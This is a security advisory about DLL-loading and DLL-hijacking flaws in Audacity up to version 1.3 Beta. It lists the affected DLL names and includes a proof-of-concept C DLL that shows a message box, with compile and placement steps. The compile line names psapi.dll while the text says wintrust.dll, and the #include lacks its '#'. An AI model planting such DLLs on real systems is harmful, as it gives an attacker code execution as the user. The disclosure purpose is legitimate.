Audacity <= 1.3 Beta Multiple Local Vulnerabilities

2010-11-02T00:00:00
ID SECURITYVULNS:DOC:25043
Type securityvulns
Reporter Securityvulns
Modified 2010-11-02T00:00:00

Description

Audacity <= 1.3 Beta Multiple Local Vulnerabilities

Name Audacity Vendor http://audacity.sourceforge.net Versions Affected <= 1.3 Beta

Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-10-29

X. INDEX

I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX

I. ABOUT THE APPLICATION


Audacity is free, open source software for recording and editing sounds.

II. DESCRIPTION


The vulnerabilities are caused due to the application loading libraries in an insecure manner.

I tested the versions 1.2.6 (stable) and the 1.3 Beta.

Other versions could be vulnerable.

III. ANALYSIS


Summary:

A) Unsafe DLL Loading B) DLL Hijacking

A) Unsafe DLL Loading


Audacity tries to load each DLLs present in the Plug-Ins directory without specifing any name. This can be exploited to execute arbitrary code with the privileges of the current logged user.

I/O on filesystem and socket have been tested correctly.

B) DLL Hijacking


The Audacity's installation folder by defaul t doesn't contains DLLs files. When it tries to load some DLLs, first of all, looks at the installation directory and after in system32 directory. Due of this is possible to hijack the load operation in order to load a malicious DLL file with the same name. The following is the list of affected DLLs:

wintrust.dll msasn1.dll msacm32.dll midimap.dll wsock32.dll ws2_32.dll ws2help.dll winmm.dll lpk.dll usp10.dll setupapi.dll crypt32.dll

IV. SAMPLE CODE


A/B) Unsafe DLL Loading / DLL Hijacking

The following is the sample code (evil.c) for wintrust.dll:

// compile: gcc -shared -o psapi.dll evil.c

include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {

MessageBox&#40;0, &quot;DLL Hijacking!&quot;, &quot;Salvatore Fresta&quot;,

MB_OK);

return TRUE;

}

Just copy it to Plug-Ins directory to exploiting the first security flaw and into the installation directory to exploiting the second security flaw.

V. FIX


No fix.